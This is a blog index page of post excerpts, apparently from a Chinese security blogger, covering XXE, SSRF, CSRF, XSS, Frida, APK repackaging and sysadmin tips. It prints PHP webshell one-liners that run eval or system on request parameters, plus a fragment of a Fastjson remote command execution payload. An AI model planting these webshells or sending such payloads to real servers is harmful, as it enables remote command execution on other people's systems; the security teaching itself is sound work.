2020年4月17日
摘要: 目录发现关闭options方案 发现 请求包随意,响应包信息如下: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsof 阅读全文
posted @ 2020-04-17 11:50 Mysticbinary 阅读(3681) 评论(0) 推荐(1) 编辑
  2020年4月16日
摘要: 目录HawkeyeGithub-MonitorGSILonline tool Hawkeye github: https://github.com/0xbug/Hawkeye 教程: https://my.oschina.net/adailinux/blog/1609221 该项目作者已经不在更新。 阅读全文
posted @ 2020-04-16 12:02 Mysticbinary 阅读(370) 评论(0) 推荐(0) 编辑
  2020年4月15日
摘要: Fastjson ⇐ 1.2.47 远程命令执行漏洞利用工具及方法记录 payload rmi://、ldap:// 可以切换尝试。 param={ "@type": "java.lang.Class", br / > "a": { "@type": "java.lang.Class", "val" 阅读全文
posted @ 2020-04-15 15:01 Mysticbinary 阅读(2362) 评论(0) 推荐(1) 编辑
摘要: 由于全球IPv4地址越来越少、越来越贵,因此大到一个组织,小到一个家庭一个人都很难获得公网IP地址,所以只能使用内网地址,从而和别人共享一个公网IP地址。在这种情况下,NAT技术诞生。 翻译 NAT(Network Address Translation:网络地址转换)是将IP 数据包头中的IP 地 阅读全文
posted @ 2020-04-15 10:21 Mysticbinary 阅读(2003) 评论(0) 推荐(0) 编辑
  2020年4月13日
摘要: springboot actuator监控是什么?类似php的phpinfor()函数,不过actuator更强大,可以查看的数据、状态更多。Actuator是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans 阅读全文
posted @ 2020-04-13 10:21 Mysticbinary 阅读(4736) 评论(0) 推荐(0) 编辑
  2020年4月10日
摘要: 默认发POST格式 Content Type: application/x www form urlencoded 发JSON格式 Content Type: application/json; charset=utf 8 阅读全文
posted @ 2020-04-10 18:18 Mysticbinary 阅读(250) 评论(0) 推荐(0) 编辑
  2020年4月9日
摘要: What is XXE? XML external entity injection (also known as XXE)。奇怪,XML External Entity 为什么不叫XEE? XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理 阅读全文
posted @ 2020-04-09 18:00 Mysticbinary 阅读(15832) 评论(0) 推荐(0) 编辑
  2020年4月4日
摘要: CentOS7主要有rpm和yum这两种包软件的管理: - RPM —— Package Manager 是一个强大的命令行驱动的软件包管理工具,用来安装、卸载、校验、查询和更新 Linux 系统上的软件包。 - YUM —— Yellow dog Updater, Modified 是一个在 Fe 阅读全文
posted @ 2020-04-04 15:20 Mysticbinary 阅读(441) 评论(0) 推荐(0) 编辑
摘要: Redis数据库分为两个部分,一个服务端,一个客户端。 安装环境 1.服务器环境: 如下使用Kali系统。 2.Redis版本 2.8.3 3.Kali系统必须预装gcc、tcl 安装Reids 先cd进到你想放redis的目录,我放在/opt/programfiles/下; 查看redis生成二进 阅读全文
posted @ 2020-04-04 14:53 Mysticbinary 阅读(647) 评论(0) 推荐(0) 编辑
摘要: 先安装zsh 安装oh my zsh 手动安装 自动安装 ` 不管使用手动 自动安装,完成后都需要重启。oh my zsh才能生效。 修改主题 挑选你喜欢的主题:https://github.com/robbyrussell/oh my zsh/wiki/Themes 阅读全文
posted @ 2020-04-04 13:36 Mysticbinary 阅读(413) 评论(0) 推荐(0) 编辑
摘要: 本文直接从防御方式开始讨论,防御CSRF有4种方法: 使用POST替代GET 检验HTTP Referer 验证码 Token 使用POST替代GET 一些程序员在开发的时候都是用GET、POST通用的函数来接收客户端的数据,这样也是某些接口有CSRF的原因之一,但是将全部接口都改成只允许POST方 阅读全文
posted @ 2020-04-04 00:27 Mysticbinary 阅读(1915) 评论(4) 推荐(2) 编辑
  2020年4月2日
摘要: 同源策略 浏览器中有两个安全机制,一个浏览器沙盒(Sandbox),另一个就是同源策略(Same Origin Policy,简称SOP) ,下面介绍同源策略。同源是指同协议、同域名、同端口,必须三同,缺一不可。下面列举了一些例子,为方便读者了解哪些是属于同源,下面列举一些案例: 根据这个策略,a. 阅读全文
posted @ 2020-04-02 22:08 Mysticbinary 阅读(1277) 评论(0) 推荐(3) 编辑
  2020年4月1日
摘要: 目录准备阶段——预制密钥过程某士兵给将军写信的过程——公钥加密将军收到密文解密的过程——私钥解密将军给士兵们发命令的过程——私钥签名士兵们接收将军命令的过程——公钥验签参考 为了用最简单的方式来讲解RSA、数字签名、验签,下面模拟2个在军事角色来讲解,毕竟加密算法的起源就是为了战争服务的。 假设有一 阅读全文
posted @ 2020-04-01 23:00 Mysticbinary 阅读(2833) 评论(0) 推荐(2) 编辑
摘要: 有时你使用的是别人搭建好的环境,不知道php.ini在哪里,或者好久没有修改配置了,已经忘记了路径在哪,所以在操作文件之前,得先要找到.ini路径。 # 找php.ini ## 方式一 ```shell $ php -i | grep 'php.ini' Configuration File (ph 阅读全文
posted @ 2020-04-01 19:05 Mysticbinary 阅读(2566) 评论(0) 推荐(0) 编辑
摘要: 命令创建账号和密码 adduser Mysticbinary #添加一个Mysticbinary用户 passwd Mysticbinary # 输入密码 授予可以切换root的权限 修改/etc/sudoers文件。 vim /etc/sudoers # Allow root to run any 阅读全文
posted @ 2020-04-01 18:24 Mysticbinary 阅读(727) 评论(0) 推荐(0) 编辑
摘要: Mybatis 的 Mapper.xml 语句中 parameterType 向SQL语句传参有两种方式:#{ } 和 ${ }。 使用#{ }是来防止SQL注入,使用${ }是用来动态拼接参数。 如何排查出 1. 检查是否有$号 如果你使用的是ide代码编辑器,那么可以通过全局搜索${ , 快速定 阅读全文
posted @ 2020-04-01 16:03 Mysticbinary 阅读(2147) 评论(0) 推荐(0) 编辑
  2020年3月26日
摘要: 目录方式一 替换微信开发者工具的cookie方式二 给系统默认浏览器设置代理 做微信公众号开发或者测试的朋友一般都会下载官方的微信开发者工具,来帮助自己开发或者测试。 微信开发者工具下载地址:https://developers.weixin.qq.com/miniprogram/dev/devto 阅读全文
posted @ 2020-03-26 23:45 Mysticbinary 阅读(3542) 评论(0) 推荐(1) 编辑
摘要: 目录基础背景知识分支Git的三个空间的认识信息、状态查询Git 全局设置常用命令免密登录SSH of Pulic Key Login Github Git就是一个文件管理工具,它可以保存文件的每一个历史记录,以便查看每一个历史节点的文件变动情况和把错误的的历史节点回滚。 Git在线教程: https 阅读全文
posted @ 2020-03-26 22:59 Mysticbinary 阅读(351) 评论(0) 推荐(0) 编辑
摘要: 什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
posted @ 2020-03-26 22:51 Mysticbinary 阅读(724) 评论(0) 推荐(0) 编辑
摘要: 类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊 阅读全文
posted @ 2020-03-26 22:46 Mysticbinary 阅读(988) 评论(0) 推荐(0) 编辑
摘要: 基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
posted @ 2020-03-26 22:41 Mysticbinary 阅读(421) 评论(0) 推荐(0) 编辑
摘要: 目录下载证书mac OS导入证书Chrome设置代理Safari设置代理 下面的操作基于Mac OS Catalina(v10.15.3),抓包拦截工具基于Burp Suite v2.1.05。 下载证书 将Burp Suite 的证书下载到本地任意一个路径下。如果使用其它抓包工具,自行搜索一下。 阅读全文
posted @ 2020-03-26 21:53 Mysticbinary 阅读(4538) 评论(0) 推荐(2) 编辑
  2020年3月24日
摘要: CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。 在HTTP当中HTTP的Header和Body之间就是用两个 阅读全文
posted @ 2020-03-24 17:02 Mysticbinary 阅读(9372) 评论(2) 推荐(0) 编辑
  2020年3月22日
摘要: 目录XSSDOM文档利用原理DOM-XSS 场景一:innerHTMLDOM-XSS 场景二:跳转DOM-XSS 场景三:evalDOM-XSS 场景四:cookie、referrerDOM-XSS 场景五:document.write 、document.URL.indexOf("id=")防护策 阅读全文
posted @ 2020-03-22 18:53 Mysticbinary 阅读(32202) 评论(3) 推荐(6) 编辑
  2020年1月7日
摘要: CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。 正常情况 正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。 我之前考虑过的方案: JS修改Referer,失败; 让用户点击第三 阅读全文
posted @ 2020-01-07 14:53 Mysticbinary 阅读(2480) 评论(0) 推荐(0) 编辑
  2020年1月6日
摘要: 标签、事件、属性 xss的攻击原理就是前端被插入了恶意的js代码,下面展示大部分可以执行js的标签、事件、属性; 标签(label) <script> <a> <p> <img> <body> <button> <var> <div> <style> <iframe> <object> <input 阅读全文
posted @ 2020-01-06 21:55 Mysticbinary 阅读(2705) 评论(0) 推荐(0) 编辑
摘要: 如下文章是早期编写,有一些错误,建议读新写的文章:https://www.cnblogs.com/mysticbinary/p/12620152.html JSONP Hijackin的中文意思是JSON劫持,而能产生JSON数据劫持的原因在于前端被跨站攻击了。跨站=跨域,跨域从字面上理解的话,就是 阅读全文
posted @ 2020-01-06 16:27 Mysticbinary 阅读(1041) 评论(0) 推荐(1) 编辑
  2019年12月27日
摘要: APK二次打包的危害 APK二次打包是Android应用安全风险中的一部分, 一般是通过反编译工具向应用中插入广告代码与相关配置,再在第三方应用市场、论坛发布。打包党对移动App带来的危害有以下几种: 1. 插入自己广告或者删除原来广告; 2. 恶意代码, 恶意扣费、木马等; 3. 修改原来支付逻辑 阅读全文
posted @ 2019-12-27 15:40 Mysticbinary 阅读(3307) 评论(0) 推荐(5) 编辑
摘要: Janus说明 Android APP仅使用V1签名,可能存在Janus漏洞(CVE 2017 13156),Janus漏洞(CVE 2017 13156)允许攻击者在不改变原签名的情况下任意修改APP中的代码逻辑。 影响范围:Android系统5.1.1 8.0 检测方式 方式1 使用GetApk 阅读全文
posted @ 2019-12-27 15:18 Mysticbinary 阅读(2276) 评论(0) 推荐(1) 编辑
  2019年12月25日
摘要: 目录测试的意义测试用例测试函数功能案例assert关键字的用法测试类功能案例安全测试案例-短信轰炸__main__全局变量解释总结 测试的意义 人们针对一个具体问题,通过分析和设计,最后用编程语言写出了一个程序,如果它通过了语言解释器(编译器)的检查,可以运行了,那么下一步的工作就是设法确认它确实满 阅读全文
posted @ 2019-12-25 22:40 Mysticbinary 阅读(1014) 评论(2) 推荐(3) 编辑
  2019年12月23日
摘要: 如下都是一些经验之谈,不定期更新,喜欢可以关注哦。 忽略ssl报错 一些证书问题会导致程序报错,解决方法为在发送请求的时候,带上verify=False参数即可; result = requests.get(burp0_url, headers=burp0_headers, verify=False 阅读全文
posted @ 2019-12-23 20:46 Mysticbinary 阅读(2354) 评论(0) 推荐(1) 编辑
  2019年12月22日
摘要: 目录with语句的应用场景使用with语句前后对比with语句的执行原理自定义open函数总结参考 with语句的应用场景 编程中有很多操作都是配套使用的,这种配套的流程可以称为计算过程,Python语言为这种计算过程专门设计了一种结构:with语句。比如文件处理就是这类计算过程的典型代表。 使用w 阅读全文
posted @ 2019-12-22 23:22 Mysticbinary 阅读(633) 评论(1) 推荐(3) 编辑
  2019年12月17日
摘要: 目录PyExecJS 使用案例查看JS引擎信息安装PhantomJS步骤案例11.访问目标网站的登录页面并查看源码2.将js放到和py脚本同一级目录下3. 编写Python脚本来调用js案例21.找登录时的加密函数2.监听鼠标点击事件查看流程3.写代码不同浏览器内核版本对URL编码处理也不同[冷知识 阅读全文
posted @ 2019-12-17 17:41 Mysticbinary 阅读(2906) 评论(0) 推荐(3) 编辑
  2019年12月10日
摘要: Frida接口功能介绍 Frida是个so级别的hook框架,它可以帮助开发、安全人员对指定的进程的so模块进行分析。它主要提供了功能简单的Python接口和功能丰富的JS接口,使得hook函数和修改so可以编程化,接口中包含了主控端与目标进程的交互接口。 目标进程的交互接口分为: JS接口 功能包 阅读全文
posted @ 2019-12-10 14:17 Mysticbinary 阅读(9489) 评论(0) 推荐(2) 编辑
  2019年12月9日
摘要: Frida是什么 我觉得官网已经说得很清楚了。简单的说就是一款动态代码检测工具,可用于各种主流操作系统,这里主要讨论的是动态检测Android系统里面代码运行情况。 Android版的Frida环境的搭建主要分为两个部分,一部分是运行在Android机器上的代理工具 ,另一部分是Windows系统用 阅读全文
posted @ 2019-12-09 19:18 Mysticbinary 阅读(3573) 评论(0) 推荐(2) 编辑
  2019年12月8日
摘要: 目录Burp + Python threading库1. Burp Suite安装插件2. 拦截包并拷贝发包的代码3. 运行Python多线程代码4. 确认结果Burp + RepeaterBurp + Turbo Intruder插件修复Reference 有时候想看看Web应用在代码或者数据库层 阅读全文
posted @ 2019-12-08 22:49 Mysticbinary 阅读(1106) 评论(1) 推荐(1) 编辑
  2019年11月26日
摘要: 在线调试 https://tool.lu/crontab/ 设置规则 # 每分钟执行一次 */1 * * * * /scripts/script.sh # 每小时执行一次 0 */1 * * * /scripts/script.sh # 每天 02:00 执行一次任务 0 2 * * * /bin/ 阅读全文
posted @ 2019-11-26 11:50 Mysticbinary 阅读(610) 评论(0) 推荐(1) 编辑
  2019年11月21日
摘要: 报错特征 在应用市场上下载了一个APK,使用Androd killer的编译的功能,结果报错了,报错信息如下: 解决 解决方式有如下几种,方式多的原因是因为系统对APK的打包方式不同,就导致对应的反编译方式也会不同 方式一 切换JDK版本 可能编写APK的JDK版本是1.7,但是你用1.8来反编译, 阅读全文
posted @ 2019-11-21 19:20 Mysticbinary 阅读(14049) 评论(0) 推荐(1) 编辑
  2019年11月19日
摘要: pip安装库时遇到的问题 我使用ubuntu系统通过pip安装MySQLdb库的时候,报了一堆错,解决了半天,没搞定。然后安装另一个库pymysql一下就OK了,它们的功能都是一样的,为什么不行没有研究,这里就做一下记录吧,防止下次在遇到这个问题。 Windows OS 使用MySQLdb库 Lin 阅读全文
posted @ 2019-11-19 19:17 Mysticbinary 阅读(431) 评论(0) 推荐(3) 编辑
  2019年11月15日
摘要: I am sorry. This article has many errors and the cited cases are not appropriate. It is not recommended to refer to or watch it. I suggest you look: h 阅读全文
posted @ 2019-11-15 19:39 Mysticbinary 阅读(11566) 评论(0) 推荐(10) 编辑